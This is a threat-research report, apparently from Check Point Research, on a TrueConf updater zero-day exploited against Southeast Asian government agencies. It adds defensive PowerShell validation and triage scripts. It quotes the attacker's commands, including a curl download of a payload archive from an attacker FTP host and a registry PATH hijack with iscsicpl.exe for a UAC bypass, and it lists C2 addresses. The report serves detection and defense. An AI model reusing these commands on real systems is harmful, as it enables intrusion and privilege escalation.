
At the beginning of 2026, Check Point Research observed a series of targeted attacks against government entities in Southeast Asia carried out via legitimate TrueConf software installed in the targets’ environment. The investigation led to the discovery of a zero-day vulnerability in the TrueConf client, tracked as CVE-2026-3502 with a CVSS score of 7.8. The flaw affects the application’s updater validation mechanism and allows an attacker controlling an on-premises TrueConf server to distribute and execute arbitrary files across connected endpoints.
TrueConf is a video conferencing platform that supports both on-premises and cloud deployments and is used across multiple regions, most prominently in Russia, as well as in East Asia, Europe, and the Americas. Serving more than 100,000 organisations globally, its customers range from governments, defense departments and critical infrastructure operators to major businesses such as banks, power utilities and TV stations. In enterprise environments, its on-premises architecture creates a trusted relationship between the central server and connected clients, especially through the platform’s update mechanism.
Basically, TrueConf acts as an on-premises video conferencing solution that operates entirely within a private local network (LAN) without requiring an internet connection. It is primarily used by government, military, and critical infrastructure sectors to ensure absolute data privacy and communication autonomy in secure or remote environments. In locations with poor or no internet connectivity, or during natural disasters when traditional networks are down, it facilitates essential coordination. By hosting the server on internal hardware, all audio, video, and chat traffic remains strictly contained on-site, with offline activation available for fully air-gapped systems.
In this particular case, that trust was abused to deliver malware due to improper validation in the update process. In the observed in-the-wild activity, operation “TrueChaos”, the threat actor used the trusted update channel of a centrally managed on-premises TrueConf server to distribute malicious updates to multiple connected government agencies in a Southeast Asian country.
The victimology and regional focus of the campaign suggest an espionage-motivated operation. In combination with the observed TTPs and command-and-control infrastructure, these indicators point with moderate confidence to a Chinese-nexus threat actor.
TrueConf is a video conferencing platform that supports both on-premises and cloud deployments. Although it is most widely used in Russia, it also has a notable presence across parts of East Asia, Europe, and the Americas. To better understand the potential scope of the vulnerability, we reviewed internet-exposed TrueConf servers to assess the platform’s geographic distribution and the possible reach of the attack. This view is necessarily incomplete, as many TrueConf deployments may operate entirely in on-premises environments and remain inaccessible from the public internet.
When the TrueConf client starts, it checks the connected on-premises server for available updates. If the server has a newer client version than the one installed, the application prompts the user to download the update from https://{trueconf_server}/downlods/trueconf_client.exe, which maps to the file stored on the server under C:\Program Files\TrueConf Server\ClientInstFiles\.
The TrueConf client update starts when the client detects that the on-premises server offers a newer version than the one installed; the client then alerts the user that a newer version is available and offers to download it.
The vulnerability stems from the lack of integrity and authenticity checks in this update flow. An attacker who gains control of the on-premises TrueConf server can replace the expected update package with an arbitrary executable, presented as the current application version, and distribute it to all connected clients. Because the client trusts the server-provided update without proper validation, the malicious file can be delivered and executed under the guise of a legitimate TrueConf update.
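The validation the page says is missing from this update flow, as an added PowerShell example. This is not TrueConf’s code and not a patch to the client; it is a pre-execution gate that an administrator, a software-distribution pipeline, or a hardened updater could apply to a downloaded package before handing it to the installer. It combines an Authenticode validity check, a pinned publisher subject (so that any validly signed binary does not pass), and a SHA-256 obtained out of band. The publisher subject and the expected hash are placeholders, not real TrueConf values.

```powershell
# Added example (not TrueConf's code): the pre-execution validation the
# page says the client lacks. Verifies that a downloaded update is
# Authenticode-signed by the expected publisher and matches a pinned hash
# before it is allowed to run. Publisher subject and hash are placeholders.

param(
    [Parameter(Mandatory)] [string] $UpdatePath,
    # Placeholder: the publisher subject an organisation would pin for its real updater.
    [string] $ExpectedSubject = 'CN=EXAMPLE-UPDATE-PUBLISHER, O=Example Corp',
    # Placeholder: a SHA-256 obtained out of band (vendor release notes, signed manifest).
    [string] $ExpectedSha256 = 'PLACEHOLDER_SHA256_FROM_OUT_OF_BAND_SOURCE'
)

function Test-UpdateIntegrity {
    param([string] $Path, [string] $Subject, [string] $Sha256)

    $findings = [System.Collections.Generic.List[string]]::new()

    if (-not (Test-Path -LiteralPath $Path)) {
        $findings.Add("File not found: $Path")
        return [pscustomobject]@{ Path = $Path; Trusted = $false; Findings = $findings }
    }

    # 1. The Authenticode signature must be cryptographically valid and chain to a trusted root.
    $sig = Get-AuthenticodeSignature -FilePath $Path
    if ($sig.Status -ne 'Valid') {
        $findings.Add("Signature status is '$($sig.Status)' (expected Valid)")
    }

    # 2. Validity alone is not enough: any valid signer would pass. Pin the publisher.
    if ($null -eq $sig.SignerCertificate) {
        $findings.Add('No signer certificate present')
    } elseif ($sig.SignerCertificate.Subject -ne $Subject) {
        $findings.Add("Signer subject '$($sig.SignerCertificate.Subject)' does not match pinned '$Subject'")
    }

    # 3. A hash pinned from an out-of-band source catches a swapped package even if the
    #    server that delivered it is fully attacker-controlled.
    $hash = (Get-FileHash -LiteralPath $Path -Algorithm SHA256).Hash
    if ($hash -ne $Sha256.ToUpperInvariant()) {
        $findings.Add("SHA-256 $hash does not match expected $Sha256")
    }

    [pscustomobject]@{
        Path     = $Path
        Trusted  = ($findings.Count -eq 0)
        Findings = $findings
    }
}

$result = Test-UpdateIntegrity -Path $UpdatePath -Subject $ExpectedSubject -Sha256 $ExpectedSha256
if ($result.Trusted) {
    Write-Output "Update passed validation; safe to hand to the installer: $UpdatePath"
    # Start-Process -FilePath $UpdatePath   # only after every check above has passed
} else {
    Write-Warning "Refusing to execute $UpdatePath"
    $result.Findings | ForEach-Object { Write-Warning "  - $_" }
    exit 1
}
```

Run it as `.\Test-Update.ps1 -UpdatePath C:\path\to\downloaded_update.exe` after replacing the two placeholders. The three checks are deliberately independent: a package that is validly signed by the wrong publisher, or correctly signed but not the package the vendor published, is rejected, which is exactly the gap a server-side swap of the update file exploits.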
The infections began when the TrueConf client application was launched, probably via a link sent to the target by the attacker. This link launched the already installed TrueConf client and presented an update prompt claiming that a newer version was available.
Prior to the victim’s interaction, the attacker had already replaced the update package on the TrueConf on-premises server with a weaponized version, ensuring that the client retrieved a malicious file through the normal update process.
The compromised TrueConf on-premises server was operated by the governmental IT department and served as a video conferencing platform for dozens of government entities across the country, which were all supplied with the same malicious update.
Analysis of the downloaded package showed that it was a weaponized client update. The installer was built with Inno Setup and successfully upgraded the client from version 8.5.1 to 8.5.2, the current version at the time. Alongside the legitimate TrueConf installation components, the package dropped a benign poweriso.exe executable and a malicious 7z-x64.dll file to the path c:\programdata\poweriso\, where the DLL was then loaded through DLL side-loading.
Using the malicious 7z-x64.dll implant, the attacker performed a series of hands-on-keyboard actions focused on reconnaissance, environment preparation, persistence, and the retrieval of additional payloads.
tasklist > cache
tracert 8.8.8.8 -h 5
curl -u ftpuser: ftp://47.237.15[.]197/update.7z -o
c:\program files\winrar\winrar.exe x update.7z -p
The attacker then modified the user’s PATH variable in order to perform a UAC bypass using the Microsoft iSCSI Initiator Control Panel tool:
reg add "hkcu\environment" /v path /t REG_SZ /d "C:\users\\appdata\local\temp" /f
c:\windows\system32\cmd.exe c:\windows\syswow64\iscsicpl.exe
iscsicpl.exe is a legitimate Windows binary that can be abused for UAC bypass because its 32-bit SysWOW64 version is auto-elevated and is vulnerable to DLL search-order hijacking for iscsiexe.dll. By placing a malicious iscsiexe.dll in a user-controlled location referenced through the user’s %PATH%, an attacker can cause Windows to resolve and load that DLL in the context of the elevated iscsicpl.exe, resulting in privilege escalation without a UAC prompt.
The downloaded update.7z archive contained a legitimate 7z.exe binary alongside iscsiexe.dll, a component used by the attackers as part of the post-compromise workflow. Check Point Research also identified additional variants of the archive that included an encrypted 7z archive named rom.dat. At the time of analysis, the contents and purpose of rom.dat remained unclear.
The iscsiexe.dll component appears to be a simple, custom persistence and privilege escalation tool. Rather than serving as a full-featured backdoor, its role was limited to maintaining execution of winexec.exe, which is the renamed poweriso.exe binary dropped earlier in the infection chain.
Although Check Point Research did not recover the exact final-stage payload associated with the malicious 7z-x64.dll activity, it observed network communication to 47.237.15[.]197, an attacker-controlled server running Havoc C2 infrastructure, and also identified a Havoc demon sample linked to the actor’s C2 infrastructure. Based on this combined evidence, Check Point Research assesses with high confidence that the missing payload was a Havoc implant.
Havoc is an open-source post-exploitation framework intended for penetration testing and adversary emulation, but it has also been repeatedly abused by threat actors in real-world intrusions, including Chinese-nexus Amaranth Dragon activity recently documented by Check Point Research.
Check Point Research assesses with moderate confidence that operation TrueChaos is associated with a Chinese-nexus threat actor. The assessment is based on a combination of factors: TTPs consistent with Chinese-nexus operations such as DLL sideloading, the use of Alibaba Cloud and Tencent hosting for command-and-control infrastructure, and victimology that aligns with Chinese-nexus strategic interests.
We also observed that the same victim was targeted within the same time frame by the ShadowPad malware framework. This may indicate overlap in operator tooling, shared access, or the presence of multiple China-aligned actors targeting the same organization in parallel.
The exploitation of CVE-2026-3502 did not require the attacker to compromise each endpoint individually. Instead, the attacker abused the trusted relationship between a central on-premises TrueConf server and its clients. By replacing a legitimate update with a malicious one, they turned the product’s normal update flow into a malware distribution channel across multiple connected government networks.
From a research perspective, this case shows how monitoring and analysing routine execution techniques can uncover far more significant threats. What initially appeared to be a signed binary used for DLL sideloading ultimately led to the discovery of a zero-day vulnerability in TrueConf’s update validation mechanism.
In order to identify whether you have been compromised, review the following indicators and hunting opportunities across the affected system:
- trueconf_windows_update.exe is unsigned, as an unsigned update executable may indicate that the file is suspicious or has been tampered with.
- C:\ProgramData\PowerISO\poweriso.exe is present on disk, especially if this file is not expected in your environment.
- HKCU\Software\Microsoft\Windows\CurrentVersion\Run\UpdateCheck points to C:\ProgramData\PowerISO\PowerISO.exe, as this indicates persistence through a user logon autorun entry.
- %AppData%\Roaming\Adobe\update.7z, 7za.exe, iscsiexe.dll, or rom.dat are present, or there is evidence that they were recently created and then deleted.
- trueconf_windows_update.tmp creates C:\ProgramData\PowerISO\poweriso.exe or 7z-x64.dll, as this behavior is consistent with the observed delivery chain.
- poweriso.exe spawning commands through cmd.exe, particularly when the command line includes tools or utilities such as curl, winrar.exe, or netstat, since this may indicate download, extraction, or discovery activity.
- trueconf.exe -> trueconf_windows_update.exe -> trueconf_windows_update.tmp -> any executable, as this sequence may reveal execution of the malicious payload.

Indicators of compromise:
- trueconf_windows_update.exe (malicious TrueConf client update): 22e32bcf113326e366ac480b077067cf
- iscsiexe.dll (loader): 9b435ad985b733b64a6d5f39080f4ae0
- 7z-x64.dll (Havoc implant): 248a4d7d4c48478dcbeade8f7dba80b3
- 43.134.90[.]60 – Havoc C2
- 43.134.52[.]221 – Havoc C2
- 47.237.15[.]197 – Havoc C2
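The hunting indicators above, together with the HKCU\Environment PATH modification from the UAC-bypass section, as a read-only PowerShell triage script to run on a suspect host. This is an added example, not Check Point Research’s or TrueConf’s tooling. The TrueConf install directory, the Sysmon log name and the 5,000-event window are assumptions, and the page’s %AppData%\Roaming\Adobe path is interpreted as $env:APPDATA\Adobe (the Roaming segment is already part of $env:APPDATA); the file hashes are the MD5s listed on the page.

```powershell
# Added example (not Check Point's or TrueConf's tooling): read-only host triage
# for the TrueChaos hunting indicators listed above and the HKCU\Environment
# PATH hijack from the UAC-bypass section. Reports findings; changes nothing.

function Get-TrueChaosIndicators {
    [CmdletBinding()]
    param(
        # Assumption: install location of the TrueConf client; adjust to your deployment.
        [string] $TrueConfDir = "$env:ProgramFiles\TrueConf"
    )

    $hits = [System.Collections.Generic.List[pscustomobject]]::new()
    function Add-Hit([string] $Indicator, [string] $Detail) {
        $hits.Add([pscustomobject]@{ Indicator = $Indicator; Detail = $Detail })
    }

    # MD5s from the page's IOC list, keyed in lowercase for comparison.
    $knownMd5 = @{
        '22e32bcf113326e366ac480b077067cf' = 'trueconf_windows_update.exe'
        '9b435ad985b733b64a6d5f39080f4ae0' = 'iscsiexe.dll'
        '248a4d7d4c48478dcbeade8f7dba80b3' = '7z-x64.dll'
    }

    # 1. Dropped files from the observed chain ($env:APPDATA already ends in \Roaming).
    $paths = @(
        "$env:ProgramData\PowerISO\poweriso.exe",
        "$env:ProgramData\PowerISO\7z-x64.dll",
        "$env:APPDATA\Adobe\update.7z",
        "$env:APPDATA\Adobe\7za.exe",
        "$env:APPDATA\Adobe\iscsiexe.dll",
        "$env:APPDATA\Adobe\rom.dat"
    )
    foreach ($p in $paths) {
        if (-not (Test-Path -LiteralPath $p)) { continue }
        Add-Hit 'File present' $p
        $md5 = (Get-FileHash -LiteralPath $p -Algorithm MD5).Hash.ToLowerInvariant()
        if ($knownMd5.ContainsKey($md5)) { Add-Hit 'Known-bad hash' "$p = $md5 ($($knownMd5[$md5]))" }
    }

    # 2. Persistence: Run key value UpdateCheck pointing at PowerISO.
    $run = Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -ErrorAction SilentlyContinue
    $val = if ($run) { [string] $run.UpdateCheck } else { '' }
    if ($val -and $val -match '(?i)PowerISO') { Add-Hit 'Run key persistence' "UpdateCheck = $val" }

    # 3. UAC-bypass preparation: user PATH redirected into a user-writable Temp directory.
    $envPath = (Get-ItemProperty -Path 'HKCU:\Environment' -Name Path -ErrorAction SilentlyContinue).Path
    if ($envPath -and $envPath -match '(?i)\\AppData\\Local\\Temp') {
        Add-Hit 'User PATH points into Temp' $envPath
    }

    # 4. Unsigned updater binary anywhere under the TrueConf directory.
    Get-ChildItem -Path $TrueConfDir -Filter 'trueconf_windows_update.exe' -Recurse -ErrorAction SilentlyContinue |
        ForEach-Object {
            $sig = Get-AuthenticodeSignature -FilePath $_.FullName
            if ($sig.Status -ne 'Valid') { Add-Hit 'Unsigned updater' "$($_.FullName) ($($sig.Status))" }
        }

    # 5. Sysmon process creation (Event ID 1): poweriso.exe -> cmd.exe running curl/winrar/netstat,
    #    and anything spawned by trueconf_windows_update.tmp. Requires Sysmon; silently skipped otherwise.
    $filter = @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 }
    $events = Get-WinEvent -FilterHashtable $filter -MaxEvents 5000 -ErrorAction SilentlyContinue
    foreach ($e in $events) {
        $x = [xml] $e.ToXml()
        $d = @{}
        foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        if ($d.ParentImage -match '(?i)\\poweriso\.exe$' -and $d.Image -match '(?i)\\cmd\.exe$' -and
            $d.CommandLine -match '(?i)\b(curl|winrar\.exe|netstat)\b') {
            Add-Hit 'poweriso.exe -> cmd.exe with download/extract/discovery tool' $d.CommandLine
        }
        if ($d.ParentImage -match '(?i)\\trueconf_windows_update\.tmp$') {
            Add-Hit 'Updater .tmp spawned a process' "$($d.ParentImage) -> $($d.Image)"
        }
    }

    return $hits
}

$findings = Get-TrueChaosIndicators
if ($findings.Count -eq 0) { Write-Output 'No TrueChaos indicators found on this host.' }
else { $findings | Format-Table -AutoSize }
```

Run it in the context of the user whose TrueConf client received the update, since checks 2 and 3 read HKCU and would otherwise inspect the wrong hive. A file that is present but does not match one of the three MD5s is still reported, because the page notes that archive variants exist and that files were in some cases created and then deleted; absence of a hash match is not evidence of a clean host.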
Operation TrueChaos: 0-Day Exploitation Against Southeast Asian Government Targets — Arc Codex